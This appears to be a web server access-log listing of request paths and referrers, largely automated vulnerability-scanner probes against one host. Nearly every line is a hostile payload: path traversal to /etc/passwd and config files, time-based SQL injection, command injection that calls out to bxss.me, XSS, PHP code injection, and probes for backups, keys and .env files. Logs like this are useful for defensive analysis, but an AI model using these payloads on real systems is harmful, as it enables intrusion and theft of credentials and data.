/1'\"/js/mage/adminhtml/flexuploader.js 1 https://104.36.149.61/
/acc/skin/install/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/default/ 1 https://104.36.149.61/
/acc/skin/install/%3b(nslookup%20hitnxonnzwizs7ba96.bxss.me||perl%20-e%20\"gethostbyname('hitnxonnzwizs7ba96.bxss.me')\")|(nslookup%20hitnxonnzwizs7ba96.bxss.me||perl%20-e%20\"gethostbyname('hitnxonnzwizs7ba96.bxss.me')\")&(nslookup%20hitnxonnzwizs7ba96.bx 1 -
/0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z/skin/install/default/ 1 https://104.36.149.61/
/acc/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/mage/adminhtml/image.js 1 -
/'.gethostbyname(lc('hitrz'.'jojsjfgv7abe9.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(100).chr(75).chr(110).chr(76).'/js/prototype/validation.js 1 -
/(nslookup%20hitmtfoweytyz8db86.bxss.me||perl%20-e%20\"gethostbyname('hitmtfoweytyz8db86.bxss.me')\")/js/prototype/ 1 -
/'%3bprint(md5(31337))%3b$a='/js/mage/adminhtml/events.js 1 -
/acc/index.php/..%2f..%2fGemfile 1 -
/acc/index.php//../../../../../../../../etc/passwd%00 1 -
/@@HcSAo/index.php/install/ 1 https://104.36.149.61/
/bxss.me/js/mage/adminhtml/giftmessage.js 1 https://104.36.149.61/
/-1%20OR%203+68-68-1=0+0+0+1/js/prototype/prototype.js 1 https://104.36.149.61/
/index.html 1 -
/'\"/skin/install/default/default/css/boxes.css 1 -
/acc/skin/install/default/%2fxfs.bxss.me/css/ie7minus.css 1 -
/acc%25'%20AND%202*3*8=6*8%20AND%20'YVkk'!='YVkk%25/js/prototype/prototype.js 1 https://104.36.149.61/
/104.36.149.61-backup.rar 1 -
/admin_area/charts/php-ofc-library/ofc_upload_image.php 1 -
/acc/skin/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/default/default/css/clears.css 1 https://104.36.149.61/
/104.36.149.61.rar 1 -
/acc%25'%20AND%202*3*8=6*8%20AND%20'9E0q'!='9E0q%25/skin/frontend/ 1 https://104.36.149.61/
/acc/js/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/ 1 -
/|(nslookup%20hitjtkyvcitwt0a581.bxss.me||perl%20-e%20\"gethostbyname('hitjtkyvcitwt0a581.bxss.me')\")/js/mage/adminhtml/accordion.js 1 -
/-1%20OR%202+42-42-1=0+0+0+1/skin/install/default/default/css/clears.css 1 https://104.36.149.61/
/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/js/scriptaculous/effects.js 1 https://104.36.149.61/
/104_database.zip 1 -
/acc/skin/install/%2fxfs.bxss.me/default/ 1 -
/echo%20kkykhb$()\\%20qynlyn\\nz^xyu||a%20%23'%20&echo%20kkykhb$()\\%20qynlyn\\nz^xyu||a%20%23|\"%20&echo%20kkykhb$()\\%20qynlyn\\nz^xyu||a%20%23/js/prototype/windows/themes/ 1 -
/acc/index.php/install/wizard/beginPost/..%2f..%2fweb.config 1 -
/acc/js/prototype/%2fxfs.bxss.me.js 1 -
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/js/prototype/windows/themes/ 1 https://104.36.149.61/
/terminal 2 -
/acc'%20AND%202*3*8=6*8%20AND%20'pAHZ'='pAHZ/js/varien/js.js 1 https://104.36.149.61/
/104_database.7z 1 -
/acc'||'/js/mage/adminhtml/backup.js 1 https://104.36.149.61/
/acc/js/1some_inexistent_file_with_long_name%00.jpg/windows/ 1 https://104.36.149.61/
/acc/1some_inexistent_file_with_long_name%00.jpg/varien/form.js 1 https://104.36.149.61/
/)/js/prototype/extended_debug.js 1 https://104.36.149.61/
/common/info.cgi 1 -
/if(now()=sysdate(),sleep(15),0)/js/mage/ 1 https://104.36.149.61/
/|echo%20jxwcny$()\\%20txnqcg\\nz^xyu||a%20%23'%20|echo%20jxwcny$()\\%20txnqcg\\nz^xyu||a%20%23|\"%20|echo%20jxwcny$()\\%20txnqcg\\nz^xyu||a%20%23/js/mage/ 1 -
/'+response.write(9173975*9024629)+'/skin/install/default/default/css/iestyles.css 1 -
/WWYyqYWj'))%20OR%20891=(SELECT%20891%20FROM%20PG_SLEEP(15))--/js/mage/ 1 https://104.36.149.61/
/acc/'\"()&%25<acx><ScRiPt%20>eCQQ(9144)<%2fScRiPt>/install/default/default/css/clears.css 1 https://104.36.149.61/
/acc/js/prototype/extended_debug.js/921499%40 1 https://104.36.149.61/
/${@print(md5(31337))}/js/varien/form.js 1 -
/echo%20llffho$()\\%20twxmjz\\nz^xyu||a%20%23'%20&echo%20llffho$()\\%20twxmjz\\nz^xyu||a%20%23|\"%20&echo%20llffho$()\\%20twxmjz\\nz^xyu||a%20%23/js/mage/adminhtml/events.js 1 -
/Http://bxss.me/t/fit.txt/index.php/install/wizard/config/ 1 https://104.36.149.61/
/acc/'\"()&%25<acx><ScRiPt%20>PjTl(9883)<%2fScRiPt>/install/default/ 1 https://104.36.149.61/
//%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cetc/passwd 1 -
/acc/skin/install/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/default/css/boxes.css 1 https://104.36.149.61/
/_ignition/execute-solution 22 -
/1some_inexistent_file_with_long_name%00.jpg/skin/install/default/ 1 https://104.36.149.61/
/.s3cfg 1 -
/acc/skin/install/default/default/bxss.me%2ft%2fxss.html%3f%2500/boxes.css 1 -
/acc/index.php//../../../WEB-INF/web.xml 1 -
/../../../../../package.json 1 -
/'+'A'.concat(70-3).concat(22*4).concat(115).concat(75).concat(107).concat(82)+(require'socket'%0aSocket.gethostbyname('hitwm'+'frlewvps937dc.bxss.me.')[3].to_s)+'/index.php/install/ 1 -
/acc/index.php/install/wizard/locale/..%2fweb.config 1 -
/cgi-bin/server.js 1 -
/OsfguVna'%3b%20waitfor%20delay%20'0:0:15'%20--%20/skin/install/default/default/css/clears.css 1 https://104.36.149.61/
/&echo%20yvfrhl$()\\%20iaiuhm\\nz^xyu||a%20%23'%20&echo%20yvfrhl$()\\%20iaiuhm\\nz^xyu||a%20%23|\"%20&echo%20yvfrhl$()\\%20iaiuhm\\nz^xyu||a%20%23/js/mage/adminhtml/form.js 1 -
/@@BbZoM/js/mage/adminhtml/product/ 1 https://104.36.149.61/
/cgi-bin/Gemfile.lock 1 -
/'.gethostbyname(lc('hitry'.'pwbptozpecf6b.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(67).chr(103).chr(90).'/js/scriptaculous/effects.js 1 -
/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/js/prototype/validation.js 1 -
/&(nslookup%20hitvdpqqroumid2941.bxss.me||perl%20-e%20\"gethostbyname('hitvdpqqroumid2941.bxss.me')\")&'\\\"`0&(nslookup%20hitvdpqqroumid2941.bxss.me||perl%20-e%20\"gethostbyname('hitvdpqqroumid2941.bxss.me')\")&`'/skin/frontend/ 1 -
/../../../package-lock.json 1 -
/|echo%20mbbyie$()\\%20bsyaie\\nz^xyu||a%20%23'%20|echo%20mbbyie$()\\%20bsyaie\\nz^xyu||a%20%23|\"%20|echo%20mbbyie$()\\%20bsyaie\\nz^xyu||a%20%23/js/prototype/tooltip.js 1 -
/&echo%20euwlnj$()\\%20zfmddm\\nz^xyu||a%20%23'%20&echo%20euwlnj$()\\%20zfmddm\\nz^xyu||a%20%23|\"%20&echo%20euwlnj$()\\%20zfmddm\\nz^xyu||a%20%23/js/prototype/prototype.js 1 -
/'+'A'.concat(70-3).concat(22*4).concat(119).concat(65).concat(100).concat(79)+(require'socket'%0aSocket.gethostbyname('hitcp'+'piwctlchde629.bxss.me.')[3].to_s)+'/skin/install/default/default/css/iestyles.css 1 -
/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/js/mage/adminhtml/sales/ 1 -
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/adminhtml/browser.js 1 https://104.36.149.61/
/'\"()&%25<acx><ScRiPt%20>mxOU(9622)<%2fScRiPt>/js/scriptaculous/effects.js 1 https://104.36.149.61/
/'%3bprint(md5(31337))%3b$a='/js/mage/adminhtml/backup.js 1 -
/acc/js/scriptaculous<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/effects.js 1 -
//..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\/etc/passwd 1 -
/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/skin/adminhtml/default/ 1 https://104.36.149.61/
/acc/js/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/adminhtml/flexuploader.js 1 https://104.36.149.61/
//skin/install/default/default/css/reset.css 1 https://104.36.149.61/
/104_db.sql.gz 1 -
/acc/js/mage/1some_inexistent_file_with_long_name%00.jpg.js 1 https://104.36.149.61/
/plugins/tinymce 1 -
/acc/index.php/install/wizard/locale/..%2f..%2f..%2fGemfile 1 -
/$(nslookup%20hitwszxcsrgdwd6e44.bxss.me||perl%20-e%20\"gethostbyname('hitwszxcsrgdwd6e44.bxss.me')\")/js/mage/adminhtml/form.js 1 -
/104.tar.gz 1 -
/acc/js/mage/.%2fadminhtml/giftoptions/ 1 https://104.36.149.61/
/cgi-bin/.env 1 -
/acc/js'\"()&%25<acx><ScRiPt%20>XkUp(9591)<%2fScRiPt>/mage/adminhtml/uploader/ 1 https://104.36.149.61/
/104.36.149.61.tar.gz 1 -
/acc/skin<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/install/default/default/css/ie7minus.css 1 -
/acc/%2fxfs.bxss.me/mage/adminhtml/accordion.js 1 -
/config/database.yml_original 1 -
/acc/js/mage/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/flexuploader.js 1 -
/^(%23$!@%23$)(()))******/skin/install/default/default/css/ie7minus.css 1 https://104.36.149.61/
/)/skin/install/default/default/css/ie7minus.css 1 https://104.36.149.61/
/acc/skin/install/default/default/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/clears.css 1 https://104.36.149.61/
/cgi-bin/welcome.cgi 1 ()%20{%20Referer
/1%00%c0%a7%c0%a2%252527%252522/skin/install/default/default/css/iestyles.css 1 https://104.36.149.61/
/backup_104.sql.tar 1 -
/acc/index.php/install/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/config/ 1 -
/acc/js/mage/adminhtml/bxss.me%2ft%2fxss.html%3f%2500/ 1 -
/acc/index.php/install'\"()&%25<acx><ScRiPt%20>6DR8(9841)<%2fScRiPt>/wizard/locale/ 1 https://104.36.149.61/
/acc/.%2fjs/mage/adminhtml/accordion.js 1 https://104.36.149.61/
/cgi-bin/.pydevproject 1 -
/)/js/prototype/debug.js 1 https://104.36.149.61/
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/adminhtml/product/ 1 https://104.36.149.61/
/.irbrc 1 -
/'.gethostbyname(lc('hitzc'.'lwnxqxrm2d5ac.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(112).chr(81).chr(99).chr(66).'/js/mage/adminhtml/sales/ 1 -
/acc'%20AND%202*3*8=6*8%20AND%20'4ixn'='4ixn/js/mage/adminhtml/events.js 1 https://104.36.149.61/
/'.print(md5(31337)).'/js/prototype/extended_debug.js 1 -
/'+response.write(9873402*9230071)+'/js/prototype/tooltip_manager.js 1 -
/(nslookup%20hittsxisrnhfse8d5f.bxss.me||perl%20-e%20\"gethostbyname('hittsxisrnhfse8d5f.bxss.me')\")/js/prototype/tooltip.js 1 -
/acc/index.php/install/wizard/config//../../../../../../../../etc/passwd%00 1 -
/acc/.%2fjs/varien/form.js 1 https://104.36.149.61/
/acc/js/mage/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/accordion.js 1 -
/'\"()&%25<acx><ScRiPt%20>eCQQ(9736)<%2fScRiPt>/skin/install/default/default/css/clears.css 1 https://104.36.149.61/
//%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c 1 -
/|echo%20qslglp$()\\%20koyyaq\\nz^xyu||a%20%23'%20|echo%20qslglp$()\\%20koyyaq\\nz^xyu||a%20%23|\"%20|echo%20qslglp$()\\%20koyyaq\\nz^xyu||a%20%23/index.php/install/wizard/config/ 1 -
/acc/js/prototype/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/ 1 https://104.36.149.61/
/acc/js/%2fxfs.bxss.me/adminhtml/uploader/ 1 -
/struts/webconsole.html 1 -
/acc/js/mage/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/backup.js 1 -
/acc'\"()&%25<acx><ScRiPt%20>PQf4(9738)<%2fScRiPt>/skin/adminhtml/ 1 https://104.36.149.61/
/)/js/mage/adminhtml/grid.js 1 https://104.36.149.61/
/acc/'\"()&%25<acx><ScRiPt%20>c1E3(9074)<%2fScRiPt>/install/default/default/css/ie7minus.css 1 https://104.36.149.61/
/acc9869628/js/prototype/extended_debug.js 1 https://104.36.149.61/
/'.gethostbyname(lc('hitio'.'wfdxiten8acf3.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(110).chr(83).chr(105).chr(71).'/skin/frontend/ 1 -
/\"+\"A\".concat(70-3).concat(22*4).concat(107).concat(81).concat(109).concat(75)+(require\"socket\"%0aSocket.gethostbyname(\"hitgw\"+\"nioxmrmj094e6.bxss.me.\")[3].to_s)+\"/skin/adminhtml/default/ 1 -
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/prototype/tooltip_manager.js 1 https://104.36.149.61/
/${9999873+10000399}/js/mage/adminhtml/sales/ 1 -
/acc'\"()&%25<acx><ScRiPt%20>fBHE(9712)<%2fScRiPt>/js/prototype/extended_debug.js 1 https://104.36.149.61/
/'.gethostbyname(lc('hitrz'.'qojwkjnnb341d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(86).chr(108).chr(86).'/js/mage/translate.js 1 -
/acc/index.php/install/wizard/beginPost/..%2f..%2f..%2f..%2fweb.config 1 -
//\\../\\../\\../\\../\\../\\../\\../\\../boot.ini 1 -
/acc/js/mage/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/backup.js 1 https://104.36.149.61/
/http://bxss.me/t/fit.txt%3F.jpg/js/mage/adminhtml/accordion.js 1 https://104.36.149.61/
///..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\boot.ini 1 -
/'.gethostbyname(lc('hitie'.'ibskumjvdb168.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(119).chr(69).chr(116).chr(75).'/index.php/install/ 1 -
/&(nslookup%20hithmmhgszfuya393a.bxss.me||perl%20-e%20\"gethostbyname('hithmmhgszfuya393a.bxss.me')\")&'\\\"`0&(nslookup%20hithmmhgszfuya393a.bxss.me||perl%20-e%20\"gethostbyname('hithmmhgszfuya393a.bxss.me')\")&`'/js/varien/js.js 1 -
/acc/index.php/..%2finstall/wizard/config/ 1 https://104.36.149.61/
/@@AOBAr/skin/adminhtml/default/ 1 https://104.36.149.61/
/acc/skin/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/default/default/css/clears.css 1 -
/acc\"%20AND%202*3*8=6*8%20AND%20\"alDk\"=\"alDk/skin/frontend/ 1 https://104.36.149.61/
/cgi/mt/mt-upgrade.cgi 1 -
/'+response.write(9455979*9095726)+'/skin/adminhtml/ 1 -
/bxss.me%2ft%2fxss.html%3f%2500/skin/adminhtml/ 1 -
/if(now()=sysdate(),sleep(15),0)/js/mage/adminhtml/form.js 1 https://104.36.149.61/
/&(nslookup%20hitgghydwzwuza56d9.bxss.me||perl%20-e%20\"gethostbyname('hitgghydwzwuza56d9.bxss.me')\")&'\\\"`0&(nslookup%20hitgghydwzwuza56d9.bxss.me||perl%20-e%20\"gethostbyname('hitgghydwzwuza56d9.bxss.me')\")&`'/js/mage/adminhtml/flexuploader.js 1 -
/acc/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/mage/adminhtml/giftoptions/ 1 https://104.36.149.61/
/.svn/entries 1 -
/'%3bprint(md5(31337))%3b$a='/js/mage/adminhtml/flexuploader.js 1 -
/administrator.cgi 1 ()%20{%20Referer
/acc/js/.%2fvarien/form.js 1 https://104.36.149.61/
/acc'%20AND%202*3*8=6*8%20AND%20'78FC'='78FC/skin/adminhtml/ 1 https://104.36.149.61/
/@@95ruD/skin/install/default/ 1 https://104.36.149.61/
/acc/1%00%c0%a7%c0%a2%252527%252522/prototype/validation.js 1 https://104.36.149.61/
/cgi-bin/../../../../../../../../z/../../../../../../../../../etc/shells 1 -
/'%3bprint(md5(31337))%3b$a='/skin/install/default/default/css/clears.css 1 -
/acc/index.php/install/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/locale/ 1 -
/acc//mage/translate.js 1 https://104.36.149.61/
/1'\"/skin/install/default/default/css/clears.css 1 https://104.36.149.61/
/acc/index.php/install/..%2f..%2f..%2fpackage.json 1 -
/if(now()=sysdate(),sleep(15),0)/js/scriptaculous/effects.js 1 https://104.36.149.61/
/acc'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'/index.php/install/wizard/locale/ 1 https://104.36.149.61/
/acc/index.php//../../../../../../../../etc/passwd 2 -
/acc/js/mage<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/adminhtml/uploader/ 1 -
/acc/skin/adminhtml/./WEB-INF/web.xml%00.jsp 2 -
/acc/index.php/..%2f..%2f..%2fweb.config 1 -
/0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z/js/mage/adminhtml/uploader/ 1 https://104.36.149.61/
/acc/js/%3b(nslookup%20hitsebggbzktc417d3.bxss.me||perl%20-e%20\"gethostbyname('hitsebggbzktc417d3.bxss.me')\")|(nslookup%20hitsebggbzktc417d3.bxss.me||perl%20-e%20\"gethostbyname('hitsebggbzktc417d3.bxss.me')\")&(nslookup%20hitsebggbzktc417d3.bxss.me||per 1 -
/..%2facc/js/mage/adminhtml/wysiwyg/ 1 https://104.36.149.61/
/acc/js/mage/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/grid.js 1 -
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/js/mage/adminhtml/uploader/ 1 https://104.36.149.61/
/acc/%3b(nslookup%20hitwtlevqfwgw8c488.bxss.me||perl%20-e%20\"gethostbyname('hitwtlevqfwgw8c488.bxss.me')\")|(nslookup%20hitwtlevqfwgw8c488.bxss.me||perl%20-e%20\"gethostbyname('hitwtlevqfwgw8c488.bxss.me')\")&(nslookup%20hitwtlevqfwgw8c488.bxss.me||perl%2 1 -
/'+response.write(9582389*9888668)+'/js/mage/adminhtml/browser.js 1 -
/acc9938038/index.php/install/wizard/locale/ 1 https://104.36.149.61/
/adminer-4.6.0.php 1 https://104.36.149.61/
/acc/skin/install/default<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/default/css/boxes.css 1 -
/acc/js/'\"()&%25<acx><ScRiPt%20>mxOU(9414)<%2fScRiPt>/effects.js 1 https://104.36.149.61/
/acc/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/install/wizard/config/ 1 -
/http://bxss.me/t/fit.txt%3F.jpg/skin/adminhtml/ 1 https://104.36.149.61/
/bxss.me/js/prototype/windows/themes/ 1 https://104.36.149.61/
/'.print(md5(31337)).'/js/mage/adminhtml/product/ 1 -
/\".gethostbyname(lc(\"hitec\".\"ehnjsumx1649a.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(102).chr(67).chr(107).chr(71).\"/skin/install/default/default/css/iestyles.css 1 -
/acc/js<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/mage/adminhtml/browser.js 1 -
/%3bassert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'))%3b/skin/adminhtml/default/ 1 -
/&(nslookup%20hitibpdtnjfwk49bfb.bxss.me||perl%20-e%20\"gethostbyname('hitibpdtnjfwk49bfb.bxss.me')\")&'\\\"`0&(nslookup%20hitibpdtnjfwk49bfb.bxss.me||perl%20-e%20\"gethostbyname('hitibpdtnjfwk49bfb.bxss.me')\")&`'/index.php/install/ 1 -
/)/js/mage/adminhtml/image.js 1 https://104.36.149.61/
/http://bxss.me/t/fit.txt%3F.jpg/js/mage/adminhtml/wysiwyg/ 1 https://104.36.149.61/
/acc/js/mage/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/ 1 https://104.36.149.61/
/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/skin/install/default/default/css/boxes.css 1 https://104.36.149.61/
/acc/index.php/..%2f..%2f..%2fpackage.json 1 -
/acc/js/mage/.%2ftranslate.js 1 https://104.36.149.61/
/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/js/mage/adminhtml/image.js 1 https://104.36.149.61/
/acc/skin/%2fxfs.bxss.me/default/default/css/reset.css 1 -
/acc/skin/install/1%00%c0%a7%c0%a2%252527%252522/ 1 https://104.36.149.61/
/1%00%c0%a7%c0%a2%252527%252522/js/prototype/validation.js 1 https://104.36.149.61/
/acc<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/js/prototype/tooltip_manager.js 1 -
/acc'%20AND%202*3*8=6*8%20AND%20'xLCT'='xLCT/js/scriptaculous/effects.js 1 https://104.36.149.61/
/html/includes/ofc/php/ofc_upload_image.php 1 -
/acc/skin/install/default/default/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/reset.css 1 https://104.36.149.61/
/acc%25'%20AND%202*3*8=6*8%20AND%20'KTEf'!='KTEf%25/js/mage/translate.js 1 https://104.36.149.61/
/acc/js/mage/adminhtml/loader.js/909260%40 1 https://104.36.149.61/
/acc/1%00%c0%a7%c0%a2%252527%252522/install/default/default/css/ie7minus.css 1 https://104.36.149.61/
/acc/skin/adminhtml/1some_inexistent_file_with_long_name%00.jpg/ 1 https://104.36.149.61/
/acc/skin/install/%3b(nslookup%20hitaomsytwiwnfa88a.bxss.me||perl%20-e%20\"gethostbyname('hitaomsytwiwnfa88a.bxss.me')\")|(nslookup%20hitaomsytwiwnfa88a.bxss.me||perl%20-e%20\"gethostbyname('hitaomsytwiwnfa88a.bxss.me')\")&(nslookup%20hitaomsytwiwnfa88a.bx 1 -
/acc/js/.%2fprototype/tooltip.js 1 https://104.36.149.61/
//%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd 1 -
/..%2f..%2fpackage-lock.json 1 -
/acc'\"()&%25<acx><ScRiPt%20>Rirk(9259)<%2fScRiPt>/js/varien/js.js 1 https://104.36.149.61/
/http://bxss.me/t/fit.txt%3F.jpg/js/mage/adminhtml/giftoptions/ 1 https://104.36.149.61/
/acc/..%2fjs/mage/adminhtml/wysiwyg/ 1 https://104.36.149.61/
/WEB-INF/jboss-web.xml.bak 1 -
//..\\..\\..\\..\\..\\..\\..\\..\\etc/passwd 2 -
/acc/js/bxss.me%2ft%2fxss.html%3f%2500/tooltip_manager.js 1 -
/acc/js/prototype/1some_inexistent_file_with_long_name%00.jpg.js 1 https://104.36.149.61/
//..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f/etc/passwd 2 -
/echo%20djugzv$()\\%20axnquz\\nz^xyu||a%20%23'%20&echo%20djugzv$()\\%20axnquz\\nz^xyu||a%20%23|\"%20&echo%20djugzv$()\\%20axnquz\\nz^xyu||a%20%23/js/mage/adminhtml/ 1 -
/Copy%20of%20WEB-INF/web.xml 1 -
/acc/js/mage/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/accordion.js 1 https://104.36.149.61/
/0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z/js/prototype/debug.js 1 https://104.36.149.61/
/backup.sql.gz 1 -
/acc\"%20AND%202*3*8=6*8%20AND%20\"UyjN\"=\"UyjN/js/mage/adminhtml/events.js 1 https://104.36.149.61/
/acc/skin/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/default/ 1 -
/acc/js/mage/'\"()&%25<acx><ScRiPt%20>QEM2(9206)<%2fScRiPt>/form.js 1 https://104.36.149.61/
/acc/1some_inexistent_file_with_long_name%00.jpg/mage/adminhtml/accordion.js 1 https://104.36.149.61/
/acc/js/mage/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/image.js 1 https://104.36.149.61/
//..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c/windows/win.ini 1 -
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/mage/adminhtml/events.js 1 https://104.36.149.61/
/Http://bxss.me/t/fit.txt/skin/install/default/default/css/iestyles.css 1 https://104.36.149.61/
/\"%3bprint(md5(31337))%3b$a=\"/js/prototype/extended_debug.js 1 -
/_ignition/health-check 2 -
/'%3bprint(md5(31337))%3b$a='/index.php/install/ 1 -
/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/skin/install/default/default/css/clears.css 1 -
/cgi-bin/ 49 -
/../index.js 1 -
/acc/js/prototype/bxss.me%2ft%2fxss.html%3f%2500.js 1 -
/1some_inexistent_file_with_long_name%00.jpg/skin/install/default/default/css/boxes.css 1 https://104.36.149.61/
/acc/js/mage/bxss.me%2ft%2fxss.html%3f%2500/ 1 -
/-1%20OR%203+688-688-1=0+0+0+1/index.php/install/ 1 https://104.36.149.61/
/acc/index.php/install//..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215windows/win.ini 1 -
/@@2VuCO/js/mage/adminhtml/giftoptions/ 1 https://104.36.149.61/
/\"%3bprint(md5(31337))%3b$a=\"/skin/install/default/default/css/clears.css 1 -
/@@G2Hrg/js/mage/adminhtml/uploader/ 1 https://104.36.149.61/
/acc/js/mage/1%00%c0%a7%c0%a2%252527%252522/flexuploader.js 1 https://104.36.149.61/
/response.write(9493101*9558622)/skin/install/default/default/css/boxes.css 1 -
/web/static/c:/windows/win.ini 1 -
/dns-query 4 -
/tNmD61AD'%3b%20waitfor%20delay%20'0:0:15'%20--%20/skin/install/default/default/css/ie7minus.css 1 https://104.36.149.61/
/1%00%c0%a7%c0%a2%252527%252522/skin/frontend/ 1 https://104.36.149.61/
/\"+response.write(9207482*9743140)+\"/js/mage/adminhtml/accordion.js 1 -
/104-dump.sql.gz 1 -
//conf.php 1 -
/id_rsa 1 -
/|echo%20zibmug$()\\%20eoxjga\\nz^xyu||a%20%23'%20|echo%20zibmug$()\\%20eoxjga\\nz^xyu||a%20%23|\"%20|echo%20zibmug$()\\%20eoxjga\\nz^xyu||a%20%23/js/prototype/ 1 -
/acc/%2fxfs.bxss.me/prototype/prototype.js 1 -
/cgi-bin/.htaccess.save 1 -
/acc/index.php//../../../../../../../../windows/win.ini%00 1 -
/acc/index.php/install/wizard/locale/..%2f..%2f..%2f..%2f..%2fweb.config 1 -
/acc/index.php/install/wizard/config//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini 2 -
/acc/index.php/install/wizard/beginPost//../../../../../../../../etc/passwd%00en 1 -
/acc\"%20AND%202*3*8=6*8%20AND%20\"d9nY\"=\"d9nY/js/prototype/tooltip_manager.js 1 https://104.36.149.61/
